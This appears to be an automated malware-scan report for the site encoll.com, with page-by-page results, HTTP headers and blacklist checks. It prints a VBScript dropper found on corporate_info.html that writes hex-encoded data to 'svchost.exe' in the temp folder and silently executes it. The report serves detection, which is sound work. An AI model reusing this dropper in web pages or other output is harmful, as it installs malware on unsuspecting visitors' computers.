Scanned pages/files
Request | Server response | Status |
http://encoll.com/ | 200 OK Content-Length: 21387 Content-Type: text/html | clean |
http://encoll.com/js/jquery.js | 200 OK Content-Length: 31033 Content-Type: application/x-javascript | clean |
http://encoll.com/js/jquery_002.js | 200 OK Content-Length: 2692 Content-Type: application/x-javascript | clean |
http://l.yimg.com/d/lib/smb/js/hosting/cp/js_source/whv2_001.js | 200 OK Content-Length: 669 Content-Type: application/javascript | clean |
http://encoll.com/corporate_info.html | 200 OK Content-Length: 300517 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103007F399E3A0000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E004000000400000100000000200000500000007000200040000000000000000D00500 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://encoll.com/index.html | 200 OK Content-Length: 21387 Content-Type: text/html | clean |
http://encoll.com/our_products.html | 200 OK Content-Length: 16116 Content-Type: text/html | clean |
http://encoll.com/placeanorder.html | 200 OK Content-Length: 11768 Content-Type: text/html | clean |
http://encoll.com/research.html | 200 OK Content-Length: 12463 Content-Type: text/html | clean |
http://encoll.com/contactus.html | 200 OK Content-Length: 865 Content-Type: text/html | clean |
http://encoll.com/test404page.js | 404 Not Found Content-Length: 73 Content-Type: text/html | clean |
http://encoll.com/dermatologyproduct.html | 200 OK Content-Length: 11077 Content-Type: text/html | clean |
http://encoll.com/dentalsurgeryproduct.html | 200 OK Content-Length: 11742 Content-Type: text/html | clean |
http://encoll.com/images/helicoll_fda.pdf | 200 OK Content-Length: 303284 Content-Type: application/pdf | clean |
http://encoll.com/cardiovascularorthopedicoproducts.html | 200 OK Content-Length: 10158 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: encoll.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 11:15:22 GMT
Accept-Ranges: bytes
Age: 0
Server: ATS/5.0.1
Content-Length: 21387
Content-Type: text/html
Last-Modified: Thu, 17 Oct 2013 08:02:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=ftlkekta9fvaa&b=3&s=h4; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.encoll.com
X-Host: p10w4.geo.gq1.yahoo.com
X-INKT-SITE: http://www.encoll.com
X-INKT-URI: http://www.encoll.com//index.html
...21387 bytes of data.
GET / HTTP/1.1
Host: encoll.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 11:15:22 GMT
Accept-Ranges: bytes
Age: 0
Server: ATS/5.0.1
Content-Length: 21387
Content-Type: text/html
Last-Modified: Thu, 17 Oct 2013 08:02:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=ftlkekta9fvaa&b=3&s=h4; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.encoll.com
X-Host: p10w4.geo.gq1.yahoo.com
X-INKT-SITE: http://www.encoll.com
X-INKT-URI: http://www.encoll.com//index.html
...21387 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: encoll.com
Referer: http://www.google.com/search?q=encoll.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: encoll.com
Referer: http://www.google.com/search?q=encoll.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=encoll.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://encoll.com/
Result: encoll.com is not infected or malware details are not published yet.
Result: encoll.com is not infected or malware details are not published yet.